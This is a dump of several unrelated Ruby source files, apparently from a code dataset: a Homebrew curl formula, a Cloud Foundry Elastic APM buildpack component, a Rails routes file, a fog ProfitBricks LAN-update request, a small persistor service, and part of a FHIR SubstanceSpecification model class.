depends_on "openldap" => :optional
end
ENV['CFLAGS'] = '-I$(brew --prefix [email protected])/include'
ENV['LDFLAGS'] = '-L$(brew --prefix [email protected])/lib'
def install
ENV["CC"] = "#{Formula["gcc@9"].opt_prefix}/bin/gcc-9"
ENV["CXX"] = "#{Formula["gcc@9"].opt_prefix}/bin/g++-9"
system "./buildconf" if build.head?
# Allow to build on Lion, lowering from the upstream setting of 10.8
ENV.append_to_cflags "-mmacosx-version-min=10.7" if MacOS.version <= :lion && OS.mac?
args = %W[
--disable-debug
--disable-dependency-tracking
--disable-silent-rules
--prefix=#{prefix}
]
# cURL has a new firm desire to find ssl with PKG_CONFIG_PATH instead of using
# "--with-ssl" any more. "when possible, set the PKG_CONFIG_PATH environment
# variable instead of using this option". Multi-SSL choice breaks w/o using it.
# if MacOS.version < :mountain_lion || build.with?("openssl") || build.with?("nghttp2")
# ENV.prepend_path "PKG_CONFIG_PATH", "#{Formula["[email protected]"].opt_lib}/pkgconfig"
# args << "--with-ssl=#{Formula["[email protected]"].opt_prefix}"
# args << "--with-ca-bundle=#{etc}/[email protected]/cert.pem"
# args << "--with-ca-path=#{etc}/[email protected]/certs"
# else
# args << "--with-darwinssl"
# args << "--without-ca-bundle"
# args << "--without-ca-path"
# end
args << "--with-ssl=#{Formula["[email protected]"].opt_prefix}"
args << "--with-ca-bundle=#{etc}/[email protected]/cert.pem"
args << "--with-ca-path=#{etc}/[email protected]/certs"
args << (build.with?("libssh2") ? "--with-libssh2" : "--without-libssh2")
args << (build.with?("libmetalink") ? "--with-libmetalink" : "--without-libmetalink")
args << (build.with?("gssapi") ? "--with-gssapi" : "--without-gssapi")
args << (build.with?("rtmpdump") ? "--with-librtmp" : "--without-librtmp")
if build.with? "c-ares"
args << "--enable-ares=#{Formula["c-ares"].opt_prefix}"
else
args << "--disable-ares"
end
args << "--disable-ldap" if build.without? "openldap"
system "./configure", *args
system "make", "install"
system "make", "install", "-C", "scripts"
libexec.install "lib/mk-ca-bundle.pl"
end
test do
# Fetch the curl tarball and see that the checksum matches.
# This requires a network connection, but so does Homebrew in general.
filename = (testpath/"test.tar.gz")
system "#{bin}/curl", "-L", stable.url, "-o", filename
filename.verify_checksum stable.checksum
system libexec/"mk-ca-bundle.pl", "test.pem"
assert_predicate testpath/"test.pem", :exist?
assert_predicate testpath/"certdata.txt", :exist?
end
end
| 38.432 | 103 | 0.650291 |
6199385c3b359c665fdc0f7e34e6ec67237130b9 | 3,597 | # frozen_string_literal: true
# Cloud Foundry Java Buildpack
# Copyright 2013-2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'
module JavaBuildpack
module Framework
# Encapsulates the functionality for enabling zero-touch Elastic APM support.
class ElasticApmAgent < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_jar
end
# Modifies the application's runtime configuration. The component is expected to transform members of the
# +context+ # (e.g. +@java_home+, +@java_opts+, etc.) in whatever way is necessary to support the function of the
# component.
#
# Container components are also expected to create the command required to run the application. These components
# are expected to read the +context+ values and take them into account when creating the command.
#
# @return [void, String] components other than containers and JREs are not expected to return any value.
# Container and JRE components are expected to return a command required to run the
# application.
# (see JavaBuildpack::Component::BaseComponent#release)
def release
credentials = @application.services.find_service(FILTER, [SERVER_URLS, SECRET_TOKEN])['credentials']
java_opts = @droplet.java_opts
configuration = {}
apply_configuration(credentials, configuration)
apply_user_configuration(credentials, configuration)
write_java_opts(java_opts, configuration)
java_opts.add_javaagent(@droplet.sandbox + jar_name)
.add_system_property('elastic.apm.home', @droplet.sandbox)
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
@application.services.one_service? FILTER, [SERVER_URLS, SECRET_TOKEN]
end
private
FILTER = /elastic-apm/.freeze
BASE_KEY = 'elastic.apm.'
SERVER_URLS = 'server_urls'
SECRET_TOKEN = 'secret_token'
SERVICE_NAME = 'service_name'
private_constant :FILTER, :SERVER_URLS, :BASE_KEY, :SECRET_TOKEN
def apply_configuration(credentials, configuration)
configuration['log_file_name'] = 'STDOUT'
configuration[SERVER_URLS] = credentials[SERVER_URLS]
configuration[SECRET_TOKEN] = credentials[SECRET_TOKEN]
configuration[SERVICE_NAME] = @application.details['application_name']
end
def apply_user_configuration(credentials, configuration)
credentials.each do |key, value|
configuration[key] = value
end
end
def write_java_opts(java_opts, configuration)
configuration.each do |key, value|
java_opts.add_system_property("elastic.apm.#{key}", value)
end
end
end
end
end
| 36.333333 | 119 | 0.700862 |
f87e3c4ffb87851ff4d917f4f2d42634f4e9155b | 7,298 | Threadable::Application.routes.draw do
get '/sign_in' => 'authentication#show'
post '/sign_in' => 'authentication#sign_in'
post '/recover-password' => 'authentication#recover_password', as: 'recover_password'
match '/sign_out' => 'authentication#sign_out', via: [:get, :delete], as: 'sign_out'
post '/sign_up' => 'sign_up#sign_up'
match '/sign_up/confirmation/:token' => 'sign_up#confirmation', via: [:get, :post], as: 'sign_up_confirmation'
get '/create' => 'organizations#new', as: 'new_organization'
post '/create' => 'organizations#create'
get '/ea/:token' => 'email_actions#show', as: 'email_action'
post '/ea/:token' => 'email_actions#take'
get '/subscribe/:organization_id' => 'subscribe#show', as: 'subscribe'
get '/subscribe/wait/:organization_id' => 'subscribe#wait', as: 'subscribe_wait'
post '/subscribe/callback' => 'subscribe#callback', as: 'subscribe_callback'
namespace :api, except: [:new, :edit] do
scope :users do
resource :current, controller: 'current_user', only: [:show, :update]
end
resources :organizations, only: [:index, :show, :update, :claim_google_account] do
post :claim_google_account
end
resources :email_domains, only: [:index, :create, :update, :destroy]
resources :groups do
post :join
post :leave
end
resources :conversations do
get :search, on: :collection
member do
post :sync
end
end
resources :tasks
resources :messages
resources :events
resources :conversation_details, only: [:show]
resources :organization_members, only: [:index, :create, :update, :destroy, :resend_invitation] do
post :resend_invitation
end
resources :group_members, only: [:index, :create, :update, :destroy]
resources :task_doers
end
get '/auth/:provider/callback', to: 'external_auth#create'
# OLD ROUTES START
get '/admin' => 'admin#show'
namespace :admin do
get 'profiler' => 'profiler#show'
get 'debug' => 'debug#show'
get 'debug/enable' => 'debug#enable'
get 'debug/disable' => 'debug#disable'
post 'organizations/:organization_id/members' => 'organization/members#add', as: 'add_organization_member'
get 'organizations/:organization_id/members/:user_id/edit' => 'organization/members#edit', as: 'edit_organization_member'
patch 'organizations/:organization_id/members/:user_id' => 'organization/members#update', as: 'update_organization_member'
delete 'organizations/:organization_id/members/:user_id' => 'organization/members#remove', as: 'remove_organization_member'
get 'organizations' => 'organizations#index', as: 'organizations'
post 'organizations' => 'organizations#create'
get 'organizations/new' => 'organizations#new', as: 'new_organization'
get 'organizations/:id/edit' => 'organizations#edit', as: 'edit_organization'
patch 'organizations/:id' => 'organizations#update', as: 'organization'
delete 'organizations/:id' => 'organizations#destroy'
get 'users' => 'users#index', as: 'users'
get 'users/emails' => 'users#emails', as: 'user_emails'
get 'users/:user_id' => 'users#show', as: 'user'
get 'users/:user_id/edit' => 'users#edit', as: 'edit_user'
post 'users/:user_id/merge' => 'users#merge', as: 'merge_user'
patch 'users/:user_id' => 'users#update', as: 'update_user'
get 'incoming_emails' => 'incoming_emails#index', as: 'incoming_emails'
get 'incoming_emails/:id' => 'incoming_emails#show', as: 'incoming_email'
post 'incoming_emails/:id/retry' => 'incoming_emails#retry', as: 'retry_incoming_email'
get 'outgoing_emails' => 'outgoing_emails#edit', as: 'outgoing_emails'
post 'outgoing_emails/retry' => 'outgoing_emails#retry', as: 'retry_outgoing_email'
constraints AdminConstraint.new do
require 'sidekiq/web'
mount Sidekiq::Web => '/background_jobs'
mount MailPreview => '/mail_preview' if defined?(MailView)
end
get '/*anything', to: redirect('/admin')
end
# OLD ROUTES START
get '/reset_password/confirm_organizations' => 'users/reset_password#confirm_organizations', as: 'confirm_organizations'
get '/reset_password/:token' => 'users/reset_password#show', as: 'reset_password'
patch '/reset_password/:token' => 'users/reset_password#reset'
post '/reset_password' => 'users/reset_password#request_link', as: 'request_reset_password_link'
resources :users, except: [:new, :destroy] do
collection do
get 'setup/:token' => 'users/setup#edit', as: 'setup'
patch 'setup/:token' => 'users/setup#update'
end
end
get '/profile' => 'profile#show'
patch '/profile' => 'profile#update'
post '/email_addresses' => 'email_addresses#create', as: 'email_addresses'
patch '/email_addresses' => 'email_addresses#update', as: 'email_address'
post '/email_addresses/resend_confirmation_email' => 'email_addresses#resend_confirmation_email', as: 'resend_email_address_confirmation'
match '/email_addresses/confirm/:token' => 'email_addresses#confirm', as: 'confirm_email_address', via: [:get, :post]
post '/api_access_tokens' => 'api_access_tokens#create', as: 'api_access_tokens'
scope '/:organization_id', :as => 'organization' do
resources :held_messages, :only => [:index, :show], controller: 'organization/held_messages' do
post :accept, on: :member
post :reject, on: :member
end
match '/unsubscribe/:token' => 'organization/email_subscriptions#unsubscribe', as: 'unsubscribe', via: [:get, :post]
match '/resubscribe/:token' => 'organization/email_subscriptions#resubscribe', as: 'resubscribe', via: [:get, :post]
end
resources :emails, :only => :create
resources :mailgun_events, :only => :create
get '/:organization_id/conversations/:conversation_id', to: redirect('/%{organization_id}/my/conversations/%{conversation_id}')
get '/:organization_id/tasks/:conversation_id', to: redirect('/%{organization_id}/my/tasks/%{conversation_id}')
get '/:organization_id/tasks/:conversation_id/ill_do_it' => 'old_email_actions#ill_do_it'
get '/:organization_id/tasks/:conversation_id/remove_me' => 'old_email_actions#remove_me'
get '/:organization_id/tasks/:conversation_id/mark_as_done' => 'old_email_actions#mark_as_done'
get '/:organization_id/tasks/:conversation_id/mark_as_undone' => 'old_email_actions#mark_as_undone'
get '/:organization_id/conversations/:conversation_id/mute' => 'old_email_actions#mute'
# OLD ROUTES END
# load the ember app, handle requests to /organization_slug
get '/frontpage' => 'homepage#show'
get '/pricing' => 'homepage#pricing'
get '/pro' => 'homepage#pricing'
post '/sign_up/:organization_id' => 'sign_up#create', as: 'organization_join'
get '/:organization_id' => 'sign_up#show'
get '/*path' => 'client_app#show'
root to: 'homepage#show'
end
| 46.782051 | 140 | 0.657714 |
1d09e7215031da70a5927d9f2791598ec9c4c132 | 8,639 | module Fog
module Compute
class ProfitBricks
class Real
# Update LAN properties
#
# ==== Parameters
# * datacenter_id<~String> - Required - UUID of the virtual data center
# * lan_id<~String> - Required - UUID of the LAN
# * properties<~Hash>:
# * name<~String> - The name of the LAN
# * public<~Integer> - Boolean indicating if the LAN faces the public Internet or not
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~Hash>:
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the created resource
# * href<~String> - URL to the object’s representation (absolute path)
# * items<~Hash> - Collection of individual lan objects
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the created resource
# * href<~String> - URL to the object’s representation (absolute path)
# * metadata<~Hash> - Hash containing the LAN metadata
# * createdDate<~String> - The date the resource was created
# * createdBy<~String> - The user who created the resource
# * etag<~String> - The etag for the resource
# * lastModifiedDate<~String> - The last time the resource has been modified
# * lastModifiedBy<~String> - The user who last modified the resource
# * state<~String> - LAN state
# * properties<~Hash> - Hash containing the LAN properties
# * name<~String> - The name of the LAN
# * public<~Boolean> - Boolean indicating if the LAN faces the public Internet or not
# * ipFailover<~Array> - Attributes related to IP failover groups
# * entities<~Hash> - Hash containing the LAN entities
# * nics<~Hash> - Hash containing the NIC properties
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the created resource
# * href<~String> - URL to the object’s representation (absolute path)
# * items<~Hash> - Collection of individual nic objects
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the created resource
# * href<~String> - URL to the object’s representation (absolute path)
# * metadata<~Hash> - Hash containing the NIC metadata
# * createdDate<~String> - The date the resource was created
# * createdBy<~String> - The user who created the resource
# * etag<~String> - The etag for the resource
# * lastModifiedDate<~String> - The last time the resource has been modified
# * lastModifiedBy<~String> - The user who last modified the resource
# * state<~String> - NIC state
# * properties<~Hash> - Hash containing the NIC properties
# * name<~String> - The name of the NIC
# * mac<~String> - The MAC address of the NIC
# * ips<~Array> - IPs assigned to the NIC represented as a collection
# * dhcp<~Boolean> - Boolean value that indicates if the NIC is using DHCP or not
# * lan<~Integer> - The LAN ID the NIC sits on
# * firewallActive<~Boolean> - Once a firewall rule is added, this will reflect a true value
# * entities<~Hash> - Hash containing the NIC entities
# * firewallrules<~Hash> - A list of firewall rules associated to the NIC represented as a collection
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the resource
# * href<~String> - URL to the object’s representation (absolute path)
# * items<~Array> - Collection of individual firewall rules objects
# * id<~String> - The resource's unique identifier
# * type<~String> - The type of the resource
# * href<~String> - URL to the object’s representation (absolute path)
# * metadata<~Hash> - Hash containing the Firewall Rule metadata
# * createdDate<~String> - The date the resource was created
# * createdBy<~String> - The user who created the resource
# * etag<~String> - The etag for the resource
# * lastModifiedDate<~String> - The last time the resource has been modified
# * lastModifiedBy<~String> - The user who last modified the resource
# * state<~String> - Firewall Rule state
# * properties<~Hash> - Hash containing the Firewall Rule properties
# * name<~String> - The name of the Firewall Rule
# * protocol<~String> - The protocol for the rule: TCP, UDP, ICMP, ANY
# * sourceMac<~Array> - Only traffic originating from the respective MAC address is allowed.
# Valid format: aa:bb:cc:dd:ee:ff. Value null allows all source MAC address
# * sourceIp<~Boolean> - Only traffic originating from the respective IPv4 address is allowed.
# Value null allows all source IPs
# * targetIp<~Integer> - In case the target NIC has multiple IP addresses, only traffic directed
# to the respective IP address of the NIC is allowed. Value null allows all target IPs
# * icmpCode<~Boolean> - Defines the allowed code (from 0 to 254) if protocol ICMP is chosen.
# Value null allows all codes.
# * icmpType<~Boolean> - Defines the allowed type (from 0 to 254) if the protocol ICMP is chosen.
# Value null allows all types
# * portRangeStart<~Boolean> - Defines the start range of the allowed port (from 1 to 65534)
# if protocol TCP or UDP is chosen. Leave portRangeStart and portRangeEnd
# value null to allow all ports
# * portRangeEnd<~Boolean> - Defines the end range of the allowed port (from 1 to 65534)
# if the protocol TCP or UDP is chosen. Leave portRangeStart and
# portRangeEnd value null to allow all ports
#
# {ProfitBricks API Documentation}[https://devops.profitbricks.com/api/cloud/v2/#update-lan]
def update_lan(datacenter_id, lan_id, options = {})
request(
:expects => [202],
:method => 'PATCH',
:path => "/datacenters/#{datacenter_id}/lans/#{lan_id}",
:body => Fog::JSON.encode(options)
)
end
end
class Mock
def update_lan(datacenter_id, lan_id, options = {})
if lan = data[:lans]['items'].find do |attrib|
attrib['datacenter_id'] == datacenter_id && attrib['id'] == lan_id
end
options.each do |key, value|
lan[key] = value
end
else
raise Fog::Errors::NotFound, 'The requested LAN resource could not be found'
end
response = Excon::Response.new
response.status = 202
response.body = lan
response
end
end
end
end
end
| 68.563492 | 144 | 0.492881 |
0172fde1d4f4868b792912663d5c565bc991784b | 845 | class PersistorService
def self.store_state(building)
round = Round.new
BuildingState.create!(round: round,
state_data: {
elevators: building.elevators.map do |elevator|
{
floor_number: elevator.floor_number,
people_carrying: elevator.people.count,
people_transported: elevator.statistics
}
end,
floors: building.floors.map do |floor|
{
people_waiting: floor.people.count
}
end
})
end
end
| 40.238095 | 77 | 0.369231 |
5d2d292165b1f06432a9d81d4c8be4a65d1929ac | 25,029 | module FHIR
class SubstanceSpecification < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
SEARCH_PARAMS = ['code']
METADATA = {
'id' => {'type'=>'id', 'path'=>'SubstanceSpecification.id', 'min'=>0, 'max'=>1},
'meta' => {'type'=>'Meta', 'path'=>'SubstanceSpecification.meta', 'min'=>0, 'max'=>1},
'implicitRules' => {'type'=>'uri', 'path'=>'SubstanceSpecification.implicitRules', 'min'=>0, 'max'=>1},
'language' => {'valid_codes'=>{'urn:ietf:bcp:47'=>['ar', 'bn', 'cs', 'da', 'de', 'de-AT', 'de-CH', 'de-DE', 'el', 'en', 'en-AU', 'en-CA', 'en-GB', 'en-IN', 'en-NZ', 'en-SG', 'en-US', 'es', 'es-AR', 'es-ES', 'es-UY', 'fi', 'fr', 'fr-BE', 'fr-CH', 'fr-FR', 'fy', 'fy-NL', 'hi', 'hr', 'it', 'it-CH', 'it-IT', 'ja', 'ko', 'nl', 'nl-BE', 'nl-NL', 'no', 'no-NO', 'pa', 'pl', 'pt', 'pt-BR', 'ru', 'ru-RU', 'sr', 'sr-RS', 'sv', 'sv-SE', 'te', 'zh', 'zh-CN', 'zh-HK', 'zh-SG', 'zh-TW']}, 'type'=>'code', 'path'=>'SubstanceSpecification.language', 'min'=>0, 'max'=>1, 'binding'=>{'strength'=>'preferred', 'uri'=>'http://hl7.org/fhir/ValueSet/languages'}},
'text' => {'type'=>'Narrative', 'path'=>'SubstanceSpecification.text', 'min'=>0, 'max'=>1},
'contained' => {'type'=>'Resource', 'path'=>'SubstanceSpecification.contained', 'min'=>0, 'max'=>Float::INFINITY},
'extension' => {'type'=>'Extension', 'path'=>'SubstanceSpecification.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'SubstanceSpecification.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'identifier' => {'type'=>'Identifier', 'path'=>'SubstanceSpecification.identifier', 'min'=>0, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.type', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.status', 'min'=>0, 'max'=>1},
'domain' => {'type'=>'CodeableConcept', 'path'=>'SubstanceSpecification.domain', 'min'=>0, 'max'=>1},
'description' => {'type'=>'string', 'path'=>'SubstanceSpecification.description', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.source', 'min'=>0, 'max'=>Float::INFINITY},
'comment' => {'type'=>'string', 'path'=>'SubstanceSpecification.comment', 'min'=>0, 'max'=>1},
'moiety' => {'type'=>'SubstanceSpecification::Moiety', 'path'=>'SubstanceSpecification.moiety', 'min'=>0, 'max'=>Float::INFINITY},
'property' => {'type'=>'SubstanceSpecification::Property', 'path'=>'SubstanceSpecification.property', 'min'=>0, 'max'=>Float::INFINITY},
'referenceInformation' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceReferenceInformation'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.referenceInformation', 'min'=>0, 'max'=>1},
'structure' => {'type'=>'SubstanceSpecification::Structure', 'path'=>'SubstanceSpecification.structure', 'min'=>0, 'max'=>1},
'code' => {'type'=>'SubstanceSpecification::Code', 'path'=>'SubstanceSpecification.code', 'min'=>0, 'max'=>Float::INFINITY},
'name' => {'type'=>'SubstanceSpecification::Name', 'path'=>'SubstanceSpecification.name', 'min'=>0, 'max'=>Float::INFINITY},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'SubstanceSpecification.molecularWeight', 'min'=>0, 'max'=>Float::INFINITY},
'relationship' => {'type'=>'SubstanceSpecification::Relationship', 'path'=>'SubstanceSpecification.relationship', 'min'=>0, 'max'=>Float::INFINITY},
'nucleicAcid' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceNucleicAcid'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.nucleicAcid', 'min'=>0, 'max'=>1},
'polymer' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstancePolymer'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.polymer', 'min'=>0, 'max'=>1},
'protein' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceProtein'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.protein', 'min'=>0, 'max'=>1},
'sourceMaterial' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSourceMaterial'], 'type'=>'Reference', 'path'=>'SubstanceSpecification.sourceMaterial', 'min'=>0, 'max'=>1}
}
class Moiety < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
MULTIPLE_TYPES = {
'amount' => ['Quantity', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Moiety.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Moiety.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Moiety.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'role' => {'type'=>'CodeableConcept', 'path'=>'Moiety.role', 'min'=>0, 'max'=>1},
'identifier' => {'type'=>'Identifier', 'path'=>'Moiety.identifier', 'min'=>0, 'max'=>1},
'name' => {'type'=>'string', 'path'=>'Moiety.name', 'min'=>0, 'max'=>1},
'stereochemistry' => {'type'=>'CodeableConcept', 'path'=>'Moiety.stereochemistry', 'min'=>0, 'max'=>1},
'opticalActivity' => {'type'=>'CodeableConcept', 'path'=>'Moiety.opticalActivity', 'min'=>0, 'max'=>1},
'molecularFormula' => {'type'=>'string', 'path'=>'Moiety.molecularFormula', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Moiety.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Moiety.amount[x]', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :role # 0-1 CodeableConcept
attr_accessor :identifier # 0-1 Identifier
attr_accessor :name # 0-1 string
attr_accessor :stereochemistry # 0-1 CodeableConcept
attr_accessor :opticalActivity # 0-1 CodeableConcept
attr_accessor :molecularFormula # 0-1 string
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountString # 0-1 string
end
class Property < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
MULTIPLE_TYPES = {
'definingSubstance' => ['Reference', 'CodeableConcept'],
'amount' => ['Quantity', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Property.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Property.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Property.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'category' => {'type'=>'CodeableConcept', 'path'=>'Property.category', 'min'=>0, 'max'=>1},
'code' => {'type'=>'CodeableConcept', 'path'=>'Property.code', 'min'=>0, 'max'=>1},
'parameters' => {'type'=>'string', 'path'=>'Property.parameters', 'min'=>0, 'max'=>1},
'definingSubstanceReference' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSpecification', 'http://hl7.org/fhir/StructureDefinition/Substance'], 'type'=>'Reference', 'path'=>'Property.definingSubstance[x]', 'min'=>0, 'max'=>1},
'definingSubstanceCodeableConcept' => {'type'=>'CodeableConcept', 'path'=>'Property.definingSubstance[x]', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Property.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Property.amount[x]', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :category # 0-1 CodeableConcept
attr_accessor :code # 0-1 CodeableConcept
attr_accessor :parameters # 0-1 string
attr_accessor :definingSubstanceReference # 0-1 Reference(SubstanceSpecification|Substance)
attr_accessor :definingSubstanceCodeableConcept # 0-1 CodeableConcept
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountString # 0-1 string
end
class Structure < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Structure.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Structure.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Structure.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'stereochemistry' => {'type'=>'CodeableConcept', 'path'=>'Structure.stereochemistry', 'min'=>0, 'max'=>1},
'opticalActivity' => {'type'=>'CodeableConcept', 'path'=>'Structure.opticalActivity', 'min'=>0, 'max'=>1},
'molecularFormula' => {'type'=>'string', 'path'=>'Structure.molecularFormula', 'min'=>0, 'max'=>1},
'molecularFormulaByMoiety' => {'type'=>'string', 'path'=>'Structure.molecularFormulaByMoiety', 'min'=>0, 'max'=>1},
'isotope' => {'type'=>'SubstanceSpecification::Structure::Isotope', 'path'=>'Structure.isotope', 'min'=>0, 'max'=>Float::INFINITY},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'Structure.molecularWeight', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Structure.source', 'min'=>0, 'max'=>Float::INFINITY},
'representation' => {'type'=>'SubstanceSpecification::Structure::Representation', 'path'=>'Structure.representation', 'min'=>0, 'max'=>Float::INFINITY}
}
class Isotope < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Isotope.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Isotope.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Isotope.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'identifier' => {'type'=>'Identifier', 'path'=>'Isotope.identifier', 'min'=>0, 'max'=>1},
'name' => {'type'=>'CodeableConcept', 'path'=>'Isotope.name', 'min'=>0, 'max'=>1},
'substitution' => {'type'=>'CodeableConcept', 'path'=>'Isotope.substitution', 'min'=>0, 'max'=>1},
'halfLife' => {'type'=>'Quantity', 'path'=>'Isotope.halfLife', 'min'=>0, 'max'=>1},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'Isotope.molecularWeight', 'min'=>0, 'max'=>1}
}
class MolecularWeight < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'MolecularWeight.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'MolecularWeight.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'MolecularWeight.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'method' => {'local_name'=>'local_method', 'type'=>'CodeableConcept', 'path'=>'MolecularWeight.method', 'min'=>0, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'MolecularWeight.type', 'min'=>0, 'max'=>1},
'amount' => {'type'=>'Quantity', 'path'=>'MolecularWeight.amount', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :local_method # 0-1 CodeableConcept
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :amount # 0-1 Quantity
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :identifier # 0-1 Identifier
attr_accessor :name # 0-1 CodeableConcept
attr_accessor :substitution # 0-1 CodeableConcept
attr_accessor :halfLife # 0-1 Quantity
attr_accessor :molecularWeight # 0-1 SubstanceSpecification::Structure::Isotope::MolecularWeight
end
class Representation < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Representation.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Representation.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Representation.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'type' => {'type'=>'CodeableConcept', 'path'=>'Representation.type', 'min'=>0, 'max'=>1},
'representation' => {'type'=>'string', 'path'=>'Representation.representation', 'min'=>0, 'max'=>1},
'attachment' => {'type'=>'Attachment', 'path'=>'Representation.attachment', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :representation # 0-1 string
attr_accessor :attachment # 0-1 Attachment
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :stereochemistry # 0-1 CodeableConcept
attr_accessor :opticalActivity # 0-1 CodeableConcept
attr_accessor :molecularFormula # 0-1 string
attr_accessor :molecularFormulaByMoiety # 0-1 string
attr_accessor :isotope # 0-* [ SubstanceSpecification::Structure::Isotope ]
attr_accessor :molecularWeight # 0-1 SubstanceSpecification::Structure::Isotope::MolecularWeight
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
attr_accessor :representation # 0-* [ SubstanceSpecification::Structure::Representation ]
end
class Code < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
